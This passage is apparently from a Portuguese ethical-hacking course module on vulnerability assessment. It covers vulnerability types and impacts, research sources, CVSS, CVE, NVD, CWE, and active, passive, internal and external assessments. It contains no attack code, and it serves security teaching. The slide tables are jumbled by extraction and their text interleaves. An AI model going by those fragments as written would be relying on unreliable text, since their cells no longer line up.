bugs, podem ajudar a mitigar as vulnerabilidades causadas por servidores não corrigidos.
ÿ Falhas de Projeto
Vulnerabilidades devido a falhas de projeto são universais para todos os dispositivos e sistemas operacionais.
Vulnerabilidades de design, como criptografia incorreta ou validação inadequada de dados, referem-se a
falhas lógicas na funcionalidade do sistema que os invasores exploram para contornar o mecanismo de
detecção e obter acesso a um sistema seguro.
ÿ Falhas do Sistema Operativo
Devido a vulnerabilidades nos sistemas operacionais, aplicativos como trojans, worms e vírus representam
ameaças. Esses ataques usam código malicioso, script ou software indesejado, o que resulta na perda de
informações confidenciais e no controle das operações do computador.
Correção oportuna do sistema operacional, instalação de aplicativos de software mínimos e uso

aplicativos com recursos de firewall são etapas essenciais que um administrador deve executar para proteger
o sistema operacional contra ataques.
ÿ Falhas de Aplicação
Falhas de aplicativos são vulnerabilidades em aplicativos que são exploradas pelos invasores.
Os aplicativos devem ser protegidos usando a validação e autorização do usuário.
Aplicativos defeituosos representam ameaças à segurança, como adulteração de dados e acesso não
autorizado a armazenamentos de configuração. Se os aplicativos não estiverem protegidos, informações
confidenciais podem ser perdidas ou corrompidas. Portanto, os desenvolvedores devem entender a anatomia
das vulnerabilidades de segurança comuns e desenvolver aplicativos altamente seguros, fornecendo validação
e autorização adequadas do usuário.
ÿ Serviços Abertos
Portas e serviços abertos podem levar à perda de dados ou ataques DoS e permitir que invasores realizem
outros ataques em outros dispositivos conectados. Os administradores devem verificar continuamente se há
portas e serviços desnecessários ou inseguros para reduzir o risco para a rede.
ÿ Senhas padrão
Os fabricantes fornecem aos usuários senhas padrão para acessar o dispositivo durante sua configuração
inicial, que os usuários devem alterar para uso futuro. Quando os usuários esquecem de atualizar as senhas
e continuam usando as senhas padrão, eles tornam os dispositivos e sistemas vulneráveis a vários ataques,
como força bruta e ataques de dicionário. Os invasores exploram essa vulnerabilidade para obter acesso ao
sistema. As senhas devem ser mantidas em sigilo; deixar de proteger a confidencialidade de uma senha
permite que o sistema seja facilmente comprometido.
ÿ Vulnerabilidades de dia zero
Vulnerabilidades de dia zero são vulnerabilidades desconhecidas em software/hardware que estão expostas,
mas ainda não corrigidas. Eles são explorados pelos invasores antes de serem reconhecidos e corrigidos
pelos desenvolvedores de software ou analistas de segurança. As vulnerabilidades de dia zero são uma das
principais ameaças cibernéticas que expõem continuamente os sistemas vulneráveis até que sejam corrigidos.
ÿ Vulnerabilidades da plataforma legada
As vulnerabilidades da plataforma legada são expostas a partir de códigos antigos ou familiares. No entanto,
eles podem causar violações de dados dispendiosas para as organizações. Usando esses códigos
desatualizados, os invasores podem descobrir facilmente vulnerabilidades de dia zero no sistema ou software
que ainda não foram corrigidas.

Exemplos de vulnerabilidades de segurança de rede
Tecnológica
Descrição
Vulnerabilidades
Vulnerabilidades do ÿ HTTP, FTP, ICMP, SNMP, SMTP são inerentemente

protocolo TCP/IP inseguros
ÿ Um sistema operacional pode ser vulnerável porque:

Vulnerabilidades do
ÿ É inerentemente inseguro
sistema operacional
ÿ Não é corrigido com as atualizações mais recentes
ÿ Vários dispositivos de rede, como

roteadores, firewall e switches podem ser
vulneráveis devido a:
dispositivo de rede
ÿ Falta de proteção por senha
Vulnerabilidades
ÿ Falta de autenticação
ÿ Protocolos de roteamento inseguros

ÿ Vulnerabilidades de firewall
Exemplos de vulnerabilidades de segurança de rede (continuação)
Configuração
Descrição
Vulnerabilidades
Vulnerabilidades Originado da transmissão insegura de detalhes da conta do

usuário, como nomes de usuário e senhas, pela rede
da conta do usuário
Vulnerabilidades da Originado da configuração de senhas fracas para contas do

conta do sistema sistema
A configuração incorreta dos serviços de Internet pode representar

Configuração sérios riscos de segurança. Por exemplo, ativar o JavaScript e
incorreta do serviço de Internet configurar incorretamente os serviços IIS, Apache, FTP e Terminal
pode criar vulnerabilidades de segurança na rede
Senha e configurações Deixar os dispositivos/produtos de rede com suas senhas e

padrão configurações padrão
Configuração
Configuração incorreta do dispositivo de rede
incorreta do dispositivo de rede

Exemplos de segurança de rede

Vulnerabilidades (continuação)
Política de segurança
Descrição
Vulnerabilidades
Política não escrita Políticas de segurança não escritas são difíceis de implementar e aplicar
Falta de continuidade na implementação e aplicação da política de

Falta de Continuidade segurança
A política pode causar desafios para a implementação de uma política de

Política
segurança consistente
Falta de consciência Falta de conhecimento da política de segurança
Exemplos de vulnerabilidades de segurança de rede

As tabelas a seguir resumem exemplos de vulnerabilidades tecnológicas, de configuração e de política de
segurança:
Vulnerabilidades Tecnológicas Descrição
Vulnerabilidades do protocolo TCP/IP ÿ HTTP, FTP, ICMP, SNMP, SMTP são inerentemente inseguros
ÿ Um sistema operacional pode ser vulnerável porque:
Vulnerabilidades do sistema operacional o É inerentemente inseguro o Não
é corrigido com as atualizações mais recentes
ÿ Vários dispositivos de rede, como roteadores, firewall e switches, podem

ser vulneráveis devido a:
o Falta de proteção por senha

Vulnerabilidades de dispositivos de rede
o Falta de autenticação
o Protocolos de roteamento inseguros

o Vulnerabilidades de firewall
Tabela 3.3: Vulnerabilidades Tecnológicas
Vulnerabilidades de configuração Descrição
ÿ Originado da transmissão insegura de detalhes da conta do usuário,

Vulnerabilidades da conta do usuário como nomes de usuário e senhas, pela rede
ÿ Originado da configuração de senhas fracas para o sistema

Vulnerabilidades da conta do sistema
contas

ÿ A configuração incorreta dos serviços de Internet pode representar sérias

riscos de segurança. Por exemplo, ativar o JavaScript e configurar
Configuração incorreta do serviço de Internet
incorretamente os serviços IIS, Apache, FTP e Terminal pode criar
vulnerabilidades de segurança na rede
ÿ Deixar os dispositivos/produtos de rede com suas senhas e configurações

Senha e configurações padrão
padrão
Configuração incorreta do dispositivo de rede ÿ Configuração incorreta do dispositivo de rede
Tabela 3.4: Vulnerabilidades de configuração
Vulnerabilidades da política de segurança Descrição
ÿ Políticas de segurança não escritas são difíceis de implementar

Política não escrita
e fazer cumprir
ÿ Falta de continuidade na implementação e cumprimento da política de

Falta de Continuidade
segurança
ÿ
A política pode causar desafios para a implementação de uma política de
Política
segurança consistente
Falta de consciência ÿ Desconhecimento da política de segurança
Tabela 3.5: Vulnerabilidades da política de segurança

Impacto das Vulnerabilidades

1 5
Divulgação de informação Perda financeira
2 6
Acesso não autorizado Consequências legais
3 4 7
Roubo de identidade Danos à reputação modificação de dados
Impacto das Vulnerabilidades
Abaixo estão listados alguns dos impactos das vulnerabilidades em redes e sistemas.
ÿ Divulgação de informações: um site ou aplicativo pode expor informações específicas do sistema

em formação.
ÿ Negação de serviço: vulnerabilidades podem impedir que os usuários acessem os serviços do site ou
outros recursos.
ÿ Escalonamento de privilégios: os invasores podem obter acesso elevado a um sistema protegido ou

Recursos.
ÿ Acesso não autorizado: Os invasores podem obter acesso não autorizado a um sistema, uma rede,
dados ou um aplicativo.
ÿ Roubo de identidade: Os invasores podem roubar as informações pessoais ou financeiras dos usuários para
cometer fraudes com sua identidade.
ÿ Exfiltração de dados: Vulnerabilidades podem levar à recuperação não autorizada e

transmissão de dados sensíveis.
ÿ Danos à reputação: Vulnerabilidades podem causar danos à reputação dos produtos e segurança de uma
empresa. Danos à reputação têm um impacto direto nos clientes, nas vendas e nos lucros.
ÿ Perda financeira: Danos à reputação podem levar à perda de negócios. Além disso, a exploração de
vulnerabilidades pode levar a despesas de recuperação de infra-estrutura de TI danificada.
ÿ Consequências legais: Se os dados pessoais dos clientes forem comprometidos, a organização pode precisar
enfrentar consequências legais na forma de multas e sanções regulatórias.

ÿ Segure pegadas: Vulnerabilidades podem permitir que invasores não sejam detectados mesmo após a execução
de um ataque.
ÿ Execução remota de código: Vulnerabilidades podem permitir a execução de código arbitrário de

servidores remotos.
ÿ Instalação de malware: as vulnerabilidades podem facilitar a infecção e a disseminação de vírus

em uma rede.
ÿ Modificação de dados: vulnerabilidades podem permitir que invasores interceptem e alterem dados em
transito.

Fluxo do módulo
1 2
3 4
Definir avaliação de vulnerabilidade

A avaliação de vulnerabilidade desempenha um papel importante no fornecimento de segurança aos recursos e
infraestrutura de qualquer organização contra várias ameaças internas e externas. Esta seção descreve
pesquisa de vulnerabilidade, avaliação de vulnerabilidade, tipos de avaliação de vulnerabilidade, sistemas de pontuação
de vulnerabilidade, ciclo de vida de gerenciamento de vulnerabilidade, ferramentas de avaliação de vulnerabilidade e
exploração de vulnerabilidade.

Pesquisa de Vulnerabilidade
ÿ O processo de análise de Um administrador precisa de pesquisa de vulnerabilidade:
protocolos, serviços e
configurações para descobrir Para coletar informações sobre tendências de segurança,
vulnerabilidades e falhas de ameaças, superfícies de ataque, vetores e técnicas de ataque
projeto que irão expor um
sistema operacional e seus
aplicativos para exploração,
Para descobrir pontos fracos no sistema operacional e nos aplicativos e
ataque ou uso indevido alertar o administrador da rede antes de um ataque à rede
ÿ As vulnerabilidades são classificadas Para coletar informações para ajudar na prevenção de problemas de
segurança
com base no nível de gravidade
(baixo, médio ou alto) e no
intervalo de exploração (local ou
remoto) Para saber como se recuperar de um ataque de rede
A pesquisa de vulnerabilidade é o processo de análise de protocolos, serviços e configurações para descobrir as

vulnerabilidades e falhas de design que exporão um sistema operacional e seus aplicativos para exploração, ataque ou
uso indevido.
Um administrador precisa de pesquisa de vulnerabilidade:
ÿ Para coletar informações sobre tendências de segurança, ameaças recém-descobertas, superfícies de ataque,
vetores e técnicas de ataque
ÿ Para encontrar pontos fracos no sistema operacional e aplicativos e alertar o administrador da rede
antes de um ataque de rede
ÿ Compreender informações que ajudem a prevenir problemas de segurança
ÿ Saber recuperar de um ataque à rede
Um hacker ético precisa acompanhar as vulnerabilidades e explorações descobertas mais recentemente para ficar um
passo à frente dos invasores por meio da pesquisa de vulnerabilidades, que inclui:
ÿ Descobrir as falhas e fraquezas do projeto do sistema que podem permitir que os invasores
comprometer um sistema
ÿ Manter-se atualizado sobre novos produtos e tecnologias e ler notícias relacionadas a

explorações atuais
ÿ Verificação de sites de hacking underground (sites Deep e Dark) para vulnerabilidades e explorações recém-
descobertas
ÿ Verificação de alertas recém-divulgados sobre inovações relevantes e produtos

melhorias nos sistemas de segurança

Especialistas em segurança e scanners de vulnerabilidade classificam as vulnerabilidades por:
ÿ Nível de gravidade (baixo, médio ou alto)
ÿ Faixa de exploração (local ou remota)
Os hackers éticos precisam conduzir pesquisas intensas com a ajuda de informações adquiridas nas fases de footprinting e scan
para encontrar vulnerabilidades.

Recursos para pesquisa de vulnerabilidade

Revista de segurança SecurityFocus
da Microsoft (MSVR) https:// https:// www.securitymagazine.com https:// www.securityfocus.com
www.microsoft.com
Leitura Sombria Revista PenTest Ajuda Net Security

https:// www.darkreading.com https:// pentestmag.com https:// www.helpnetsecurity.com
SecurityTracker Revista SC HackerStorm

https:// securitytracker.com https:// www.scmagazine.com http:// www.hackerstorm.co.uk
Trend Micro Explorar banco de Computerworld

https:// www.trendmicro.com dados https:// www.exploit-db.com https:// www.computerworld.com
Recursos para pesquisa de vulnerabilidade
A seguir estão alguns dos sites online usados para realizar pesquisas de vulnerabilidade:
ÿ Microsoft Vulnerability Research (MSVR) (https:// www.microsoft.com)
ÿ Leitura Escura (https:// www.darkreading.com)
ÿ SecurityTracker (https:// securitytracker.com)
ÿ Trend Micro (https:// www.trendmicro.com)
ÿ Revista de Segurança (https:// www.securitymagazine.com)
ÿ Revista PenTest (https:// pentestmag.com)
ÿ Revista SC (https:// www.scmagazine.com)
ÿ Explorar banco de dados (https:// www.exploit-db.com)
ÿ SecurityFocus (https:// www.securityfocus.com)
ÿ Ajuda Net Security (https:// www.helpnetsecurity.com)
ÿ HackerStorm (http:// www.hackerstorm.co.uk)
ÿ Computerworld (https:// www.computerworld.com)
ÿ WindowsSecurity (http:// www.windowsecurity.com)
ÿ D'Crypt (https:// www.d-crypt.com)

O que é Avaliação de
Vulnerabilidade ?
ÿ Avaliação de vulnerabilidade é um exame aprofundado
da capacidade de um sistema ou aplicativo,
incluindo procedimentos e controles de segurança
atuais, para resistir à exploração
ÿ Reconhece, mede e classifica a segurança
vulnerabilidades em um sistema de computador,
rede e canais de comunicação
Uma avaliação de vulnerabilidade pode ser usada para:
ÿ Identificar pontos fracos que podem ser explorados
ÿ Prever a eficácia de medidas de segurança adicionais na proteção

de recursos de informação contra ataques
O que é Avaliação de Vulnerabilidade?
Uma avaliação de vulnerabilidade é um exame aprofundado da capacidade de um sistema ou aplicativo, incluindo

procedimentos e controles de segurança atuais, de resistir à exploração. Ele verifica as redes em busca de vulnerabilidades
de segurança conhecidas e reconhece, mede e classifica as vulnerabilidades de segurança em sistemas de computador,
redes e canais de comunicação. Ele identifica, quantifica e classifica possíveis vulnerabilidades a ameaças em um sistema.
Além disso, ele ajuda os profissionais de segurança a proteger a rede, identificando brechas ou vulnerabilidades de
segurança no mecanismo de segurança atual antes que os invasores possam explorá-las.
Uma avaliação de vulnerabilidade pode ser usada para:
ÿ Identificar fragilidades que poderão ser exploradas
ÿ Prever a eficácia de medidas de segurança adicionais na proteção de informações

recursos de ataque
Normalmente, as ferramentas de varredura de vulnerabilidade pesquisam segmentos de rede em busca de dispositivos

habilitados para IP e enumeram sistemas, sistemas operacionais e aplicativos para identificar vulnerabilidades resultantes
de negligência do fornecedor, atividades de administração de sistema ou rede ou atividades do dia-a-dia.
O software de verificação de vulnerabilidades verifica o computador em relação ao índice Common Vulnerability and
Exposures (CVE) e aos boletins de segurança fornecidos pelo fornecedor do software.
Limitações da Avaliação de Vulnerabilidade
A seguir estão algumas das limitações das avaliações de vulnerabilidade:
ÿ O software de verificação de vulnerabilidades é limitado em sua capacidade de detectar vulnerabilidades em um determinado

ponto no tempo

ÿ O software de verificação de vulnerabilidades deve ser atualizado quando novas vulnerabilidades são
descoberto ou quando melhorias são feitas no software que está sendo usado
ÿ O software é tão eficaz quanto a manutenção realizada nele pelo fornecedor do software e pelo
administrador que o utiliza
ÿ Avaliação de vulnerabilidade não mede a força dos controles de segurança
ÿ O próprio software de verificação de vulnerabilidades não é imune a falhas de engenharia de software que
pode levar à perda de vulnerabilidades graves
ÿ O julgamento humano é necessário para analisar os dados após a digitalização e identificação do falso
positivos e falsos negativos.

Informações Obtidas da Vulnerabilidade

Digitalizando
Versão do sistema operacional em Portas abertas e serviços Vulnerabilidades de

execução em computadores ou dispositivos em execução aplicativos e serviços
Erros de configuração de Contas com senhas fracas Patches e hotfixes ausentes

aplicativos e serviços
Informações obtidas da verificação de vulnerabilidade
Os scanners de vulnerabilidade são capazes de identificar as seguintes informações:
ÿ A versão do sistema operacional em execução em computadores ou dispositivos
ÿ
Portas IP e Transmission Control Protocol/User Datagram Protocol (TCP/UDP) que estão escutando
ÿ Aplicações instaladas nos computadores
ÿ Contas com senhas fracas
ÿ Arquivos e pastas com permissões fracas
ÿ Serviços e aplicativos padrão que podem precisar ser desinstalados
ÿ Erros na configuração de segurança de aplicações comuns
ÿ Computadores expostos a vulnerabilidades conhecidas ou relatadas publicamente
ÿ Informações do software EOL/EOS
ÿ Patches e hotfixes ausentes
ÿ Configurações de rede fracas e portas mal configuradas ou arriscadas
ÿ Ajuda para verificar o inventário de todos os dispositivos na rede

Abordagens de verificação de vulnerabilidade

Duas abordagens para verificação de vulnerabilidade de rede:
Verificação ativa Varredura Passiva
ÿ O invasor interage diretamente com a ÿ O invasor tenta encontrar vulnerabilidades

rede de destino para encontrar sem interagir diretamente com a rede de
vulnerabilidades destino
ÿ Exemplo: um invasor envia sondagens ÿ Exemplo: um invasor adivinha as

e solicitações especialmente criadas informações do sistema operacional,
para o host de destino na rede para aplicativos e versões de aplicativos e
identificar vulnerabilidades serviços observando a configuração e
desmontagem da conexão TCP
Abordagens de verificação de vulnerabilidade
Existem duas abordagens para a varredura de vulnerabilidade de rede:
ÿ Varredura Ativa: O invasor interage diretamente com a rede de destino para encontrar vulnerabilidades.
A verificação ativa ajuda a simular um ataque na rede de destino para descobrir vulnerabilidades que
podem ser exploradas pelo invasor.
Exemplo: um invasor envia sondagens e solicitações especialmente criadas para o host de destino na
rede para identificar vulnerabilidades.
ÿ Varredura Passiva: O invasor tenta encontrar vulnerabilidades sem interagir diretamente com a rede de
destino. O invasor identifica vulnerabilidades por meio de informações expostas pelos sistemas durante
as comunicações normais. A verificação passiva identifica os sistemas operacionais ativos, aplicativos
e portas em toda a rede de destino, monitorando a atividade para determinar suas vulnerabilidades.
Essa abordagem fornece informações sobre pontos fracos, mas não fornece um caminho para
combater ataques diretamente.
Exemplo: um invasor adivinha as informações do sistema operacional, aplicativos e versões de

aplicativos e serviços observando a configuração e desmontagem da conexão TCP.
Os invasores procuram vulnerabilidades usando ferramentas como Nessus, Qualys, GFI LanGuard e OpenVAS.
A verificação de vulnerabilidade permite que um invasor identifique vulnerabilidades de rede, portas abertas e
serviços em execução, erros de configuração de aplicativos e serviços e vulnerabilidades de aplicativos e
serviços.

Sistemas e bancos de dados de pontuação de vulnerabilidade
ÿ Uma estrutura aberta para comunicar as características e impactos das vulnerabilidades de TI Comum
Vulnerabilidade
ÿ
Seu modelo quantitativo garante medições precisas repetíveis, enquanto permite que os usuários visualizem Sistema de pontuação
as características de vulnerabilidade subjacentes usadas para gerar as pontuações (CVSS)
Classificações CVSS v3.0
Gravidade Faixa de pontuação básica
Nenhum 0,0
Baixo 0,1-3,9
Médio 4,0-6,9
Alto 7,0-8,9
Crítico 9,0-10,0
Classificações CVSS v2.0
Baixo 0,0-3,9
Médio 4,0-6,9
Alto 7,0-10
https:// www.first.org
https:// nvd.nist.gov
Sistemas e bancos de dados de pontuação de vulnerabilidade (continuação)
Comum
Vulnerabilidades e
Exposições (CVE)
Uma lista ou dicionário

disponível publicamente e de uso
gratuito de identificadores
padronizados para vulnerabilidades
de software comuns e
exposições
https:// cve.mitre.org

Vulnerabilidade
Sistemas de pontuação e
Bancos de dados (continuação)
Banco de Dados Nacional de Vulnerabilidade (NVD)
ÿ Um repositório do governo dos EUA baseado em padrões

dados de gerenciamento de vulnerabilidade representados usando o
Protocolo de automação de conteúdo de segurança (SCAP)
ÿ Esses dados permitem a automação da vulnerabilidade

gerenciamento, medição de segurança e conformidade
ÿ O NVD inclui bancos de dados de referências de lista de

verificação de segurança, falhas de software relacionadas à
segurança, configurações incorretas, nomes de produtos e métricas de impacto
https:// nvd.nist.gov
Sistemas e bancos de dados de

pontuação de vulnerabilidade (continuação)
Enumeração de Fraqueza Comum (CWE)
Um sistema de categorias para vulnerabilidades e

fraquezas de software
É patrocinado pelo National Cybersecurity FFRDC,

que pertence à The MITRE Corporation, com o apoio do US-
CERT e da Divisão Nacional de Segurança Cibernética do
Departamento de Segurança Interna dos EUA.
Possui mais de 600 categorias de pontos fracos,

que permitem que o CWE seja efetivamente empregado
pela comunidade como uma linha de base para
esforços de identificação, mitigação e prevenção
de pontos fracos
https:// cwe.mitre.org
Sistemas e bancos de dados de pontuação de vulnerabilidade
Devido à crescente gravidade dos ataques cibernéticos, a pesquisa de vulnerabilidade tornou-se crítica, pois ajuda a mitigar
a chance de ataques. A pesquisa de vulnerabilidade fornece conhecimento de técnicas avançadas para identificar falhas ou
brechas no software que podem ser exploradas por invasores.
Os sistemas de pontuação de vulnerabilidade e os bancos de dados de vulnerabilidade são usados pelos analistas de
segurança para classificar as vulnerabilidades do sistema de informações e fornecer uma pontuação composta da gravidade geral e

risco associado às vulnerabilidades identificadas. Os bancos de dados de vulnerabilidades coletam e mantêm informações
sobre várias vulnerabilidades presentes nos sistemas de informação.
A seguir estão alguns dos sistemas e bancos de dados de pontuação de vulnerabilidade:
ÿ Sistema de Pontuação de Vulnerabilidade Comum (CVSS)
ÿ Vulnerabilidades e Exposições Comuns (CVE)
ÿ Base de Dados Nacional de Vulnerabilidades (NVD)
ÿ Enumeração de Fraqueza Comum (CWE)
Sistema de Pontuação de Vulnerabilidade Comum (CVSS)
Fonte: https:// www.first.org, https:// nvd.nist.gov
CVSS é um padrão publicado que fornece uma estrutura aberta para comunicar as características e os impactos das
vulnerabilidades de TI. O modelo quantitativo do sistema garante medições precisas e repetíveis enquanto permite que os
usuários vejam as características de vulnerabilidade subjacentes que foram usadas para gerar as pontuações. Assim, o
CVSS é adequado como um sistema de medição padrão para setores, organizações e governos que precisam de
pontuações de impacto de vulnerabilidade precisas e consistentes. Dois usos comuns do CVSS são priorizar as atividades
de correção de vulnerabilidades e calcular a gravidade das vulnerabilidades descobertas nos sistemas. O National
Vulnerability Database (NVD) fornece pontuações CVSS para quase todas as vulnerabilidades conhecidas.
O CVSS ajuda a capturar as principais características de uma vulnerabilidade e a produzir uma pontuação numérica para
refletir sua gravidade. Essa pontuação numérica pode, posteriormente, ser traduzida em uma representação qualitativa
(como baixa, média, alta ou crítica) para ajudar as organizações a avaliar e priorizar adequadamente seus processos de
gerenciamento de vulnerabilidades.
A avaliação CVSS consiste em três métricas para medir vulnerabilidades:
ÿ Base Métrica: Representa as qualidades inerentes de uma vulnerabilidade
ÿ Métrica Temporal: Representa os recursos que continuam a mudar durante o tempo de vida de
a vulnerabilidade.
ÿ Métrica Ambiental: Representa vulnerabilidades baseadas em um determinado

ambiente ou implementação.
Cada métrica define uma pontuação de 1 a 10, sendo 10 a mais grave. A pontuação CVSS é calculada e gerada por uma
string vetorial, que representa a pontuação numérica para cada grupo na forma de um bloco de texto. A calculadora CVSS
classifica as vulnerabilidades de segurança e fornece ao usuário informações sobre a gravidade geral e o risco relacionado
à vulnerabilidade.
Nenhum 0,0
Baixo 0,1-3,9

Médio 4,0-6,9
Alto 7,0-8,9
Crítico 9,0-10,0
Tabela 3.6: Classificações do CVSS v3.0
Baixo 0,0-3,9
Médio 4,0-6,9
Alto 7,0-10
Tabela 3.7: Classificações do CVSS v2.0
Figura 3.13: Calculadora do sistema de pontuação de vulnerabilidade comum versão 3
Vulnerabilidades e exposições comuns (CVE)
Fonte: https:// cve.mitre.org
CVE® é uma lista ou dicionário disponível publicamente e de uso gratuito de identificadores padronizados para
vulnerabilidades e exposições comuns de software. O uso de Identificadores CVE, ou “IDs CVE”, que

são atribuídos pelas autoridades de numeração CVE (CNAs) de todo o mundo, garantem a confiança entre as partes
ao discutir ou compartilhar informações sobre uma vulnerabilidade exclusiva de software ou firmware. O CVE fornece
uma linha de base para avaliação de ferramentas e permite a troca de dados para automação de segurança
cibernética. Os IDs CVE fornecem uma linha de base para avaliar a cobertura de ferramentas e serviços para que os
usuários possam determinar quais ferramentas são mais eficazes e apropriadas para as necessidades de sua
organização. Resumindo, produtos e serviços compatíveis com CVE fornecem melhor cobertura, interoperabilidade
mais fácil e segurança aprimorada.
O que é CVE:
ÿ Um identificador para uma vulnerabilidade ou exposição
ÿ Uma descrição padronizada para cada vulnerabilidade ou exposição
ÿ Um dicionário em vez de um banco de dados
ÿ Um método para bancos de dados e ferramentas diferentes para “falar” a mesma língua
ÿ O caminho para a interoperabilidade e melhor cobertura de segurança
ÿ Uma base para avaliação entre serviços, ferramentas e bancos de dados
ÿ Gratuito para o público baixar e usar
ÿ Aprovado pela indústria por meio das autoridades de numeração CVE, CVE Board e os inúmeros produtos e
serviços que incluem CVE
Figura 3.14: Vulnerabilidades e Exposições Comuns (CVE)

Banco de Dados Nacional de Vulnerabilidade (NVD)
Fonte: https:// nvd.nist.gov
O NVD é o repositório do governo dos EUA de dados de gerenciamento de vulnerabilidades baseados em padrões.
Ele usa o Security Content Automation Protocol (SCAP). Esses dados permitem a automação do gerenciamento
de vulnerabilidades, medição de segurança e conformidade. O NVD inclui bancos de dados de referências de lista
de verificação de segurança, falhas de software relacionadas à segurança, configurações incorretas, nomes de
produtos e métricas de impacto.
O NVD realiza uma análise em CVEs que foram publicados no CVE Dictionary. A equipe do NVD tem a tarefa de
analisar os CVEs, agregando pontos de dados da descrição, referências fornecidas e quaisquer dados
suplementares que estejam disponíveis publicamente. Essa análise resulta em métricas de impacto de associação
(Common Vulnerability Scoring System – CVSS), tipos de vulnerabilidade (Common Weakness Enumeration —
CWE) e declarações de aplicabilidade (Common Platform Enumeration — CPE), bem como outros metadados
pertinentes. O NVD não realiza testes de vulnerabilidade ativamente; ele conta com fornecedores, pesquisadores
de segurança terceirizados e coordenadores de vulnerabilidade para fornecer informações que são usadas para
atribuir esses atributos.
Figura 3.15: Captura de tela mostrando os detalhes do CVE no National Vulnerability Database (NVD)

Enumeração de Fraqueza Comum (CWE)
Fonte: https:// cwe.mitre.org
Common Weakness Enumeration (CWE) é um sistema de categorias para vulnerabilidades e fraquezas de

software. É patrocinado pelo National Cybersecurity FFRDC, que pertence à The MITRE Corporation, com o apoio
do US-CERT e da National Cyber Security Division dos EUA.
Departamento de Segurança Interna. A última versão 3.2 do padrão CWE foi lançada em janeiro de 2019. Possui
mais de 600 categorias de pontos fracos, o que dá ao CWE a capacidade de ser efetivamente empregado pela
comunidade como uma linha de base para esforços de identificação, mitigação e prevenção de pontos fracos. Ele
também possui uma técnica de pesquisa avançada em que os invasores podem pesquisar e visualizar pontos
fracos com base em conceitos de pesquisa, conceitos de desenvolvimento e conceitos de arquitetura.
Figura 3.16: Captura de tela mostrando os resultados do CWE para a consulta SMB

Tipos de Avaliação de Vulnerabilidade
Ativo Usa um scanner de rede para encontrar hosts, serviços

Avaliação e vulnerabilidades
Avalia a rede da perspectiva de um hacker para descobrir

Externo
explorações e vulnerabilidades acessíveis ao mundo externo
Avaliação
Conduz uma verificação de nível de configuração para

baseado em host identificar configurações do sistema, diretórios de usuários, sistemas
Avaliação de arquivos, configurações de registro, etc., para avaliar a
possibilidade de comprometimento
Testa e analisa todos os elementos da infraestrutura

Inscrição
da web para qualquer configuração incorreta, conteúdo
Avaliação
desatualizado ou vulnerabilidades conhecidas
Tipos de avaliação de vulnerabilidade (continuação)
Usado para farejar o tráfego de rede para descobrir Passiva

sistemas ativos, serviços de rede, aplicativos e Avaliação
vulnerabilidades presentes
Varre a infraestrutura interna para descobrir explorações e interno

vulnerabilidades Avaliação
baseado
Determina possíveis ataques de segurança de rede que em rede
podem ocorrer no sistema da organização Avaliação
Concentra-se em testar bancos de dados, como MYSQL, MSSQL,

Base de dados
ORACLE, POSTGRESQL, etc., quanto à presença
Avaliação
de exposição de dados ou vulnerabilidades do tipo injeção

Tipos de avaliação de vulnerabilidade (continuação)
Avaliação de rede sem fio Avaliação Distribuída
Determina as vulnerabilidades nas redes Avalia os ativos distribuídos da organização, como

sem fio da organização aplicativos cliente e servidor, simultaneamente por meio de
técnicas de sincronização apropriadas
Avaliação credenciada Avaliação não credenciada
Avalia a rede obtendo as credenciais de todas Avalia a rede sem adquirir nenhuma credencial dos
as máquinas presentes na rede ativos presentes na rede corporativa
Avaliação manual Avaliação automatizada
Nesse tipo de avaliação, o hacker ético avalia Nesse tipo de avaliação, o hacker ético emprega
manualmente as vulnerabilidades, classificação diversas ferramentas de avaliação de vulnerabilidades,
de vulnerabilidade, pontuação de vulnerabilidade, etc. como Nessus, Qualys, GFI LanGuard, etc.
Tipos de Avaliação de Vulnerabilidade
Abaixo estão os diferentes tipos de avaliações de vulnerabilidade:
ÿ Avaliação Ativa
Um tipo de avaliação de vulnerabilidade que usa scanners de rede para identificar os hosts, serviços e
vulnerabilidades presentes em uma rede. Os verificadores de rede ativos podem reduzir a intromissão das
verificações que executam.
ÿ Avaliação Passiva
As avaliações passivas farejam o tráfego presente na rede para identificar os sistemas ativos, serviços de rede,
aplicativos e vulnerabilidades. As avaliações passivas também fornecem uma lista dos usuários que estão
acessando a rede no momento.
ÿ Avaliação Externa
A avaliação externa examina a rede do ponto de vista de um hacker para identificar explorações e
vulnerabilidades acessíveis ao mundo externo. Esses tipos de avaliação usam dispositivos externos, como
firewalls, roteadores e servidores. Uma avaliação externa estima a ameaça de ataques de segurança de rede
de fora da organização. Determina o nível de segurança da rede externa e do firewall.
A seguir estão algumas das etapas possíveis na realização de uma avaliação externa:
o Determinar um conjunto de regras para configurações de firewall e roteador para o

rede
o Verifique se os dispositivos do servidor externo e os dispositivos de rede estão mapeados
o Identificar portas abertas e serviços relacionados na rede externa

o Examine os níveis de patch no servidor e nos dispositivos de rede externos
o Revise os sistemas de detecção, como IDS, firewalls e proteção da camada de aplicativos

sistemas
o Obter informações sobre zonas DNS
o Varrer a rede externa através de uma variedade de ferramentas proprietárias disponíveis no

Internet
o Examine aplicativos da Web, como e-commerce e software de carrinho de compras, para

vulnerabilidades
ÿ Avaliação Interna
Uma avaliação interna envolve examinar a rede interna para encontrar explorações e vulnerabilidades. A
seguir estão algumas das etapas possíveis na execução de um
avaliação:
o Especifique as portas abertas e serviços relacionados em dispositivos de rede, servidores e

sistemas
o Verifique as configurações do roteador e os conjuntos de regras do firewall
o Liste as vulnerabilidades internas do sistema operacional e do servidor
o Verifique se há trojans que possam estar presentes no ambiente interno
o Verifique os níveis de patch nos dispositivos de rede interna da organização, servidores e

sistemas
o Verifique a existência de atividade de malware, spyware e vírus e documente-os
o Avalie a segurança física
o Identificar e revisar o processo e os eventos de gerenciamento remoto
o Avalie os mecanismos de compartilhamento de arquivos (por exemplo, compartilhamentos NFS e SMB/CIFS)
o Examine a implementação do antivírus e os eventos
ÿ Avaliação Baseada no Anfitrião
As avaliações baseadas em host são um tipo de verificação de segurança que envolve a realização de uma
verificação de nível de configuração para identificar configurações do sistema, diretórios de usuários, sistemas
de arquivos, configurações de registro e outros parâmetros para avaliar a possibilidade de comprometimento.
Essas avaliações verificam a segurança de uma rede ou servidor específico.
Os scanners baseados em host avaliam os sistemas para identificar vulnerabilidades, como tabelas de
configuração nativas, registro incorreto ou permissões de arquivo e erros de configuração de software. As
avaliações baseadas em host usam muitas ferramentas de varredura comerciais e de código aberto.
ÿ Avaliação baseada em rede
As avaliações de rede determinam os possíveis ataques de segurança de rede que podem ocorrer no sistema
de uma organização. Essas avaliações descobrem recursos de rede e mapeiam as portas e serviços em
execução em várias áreas da rede. Ele avalia o

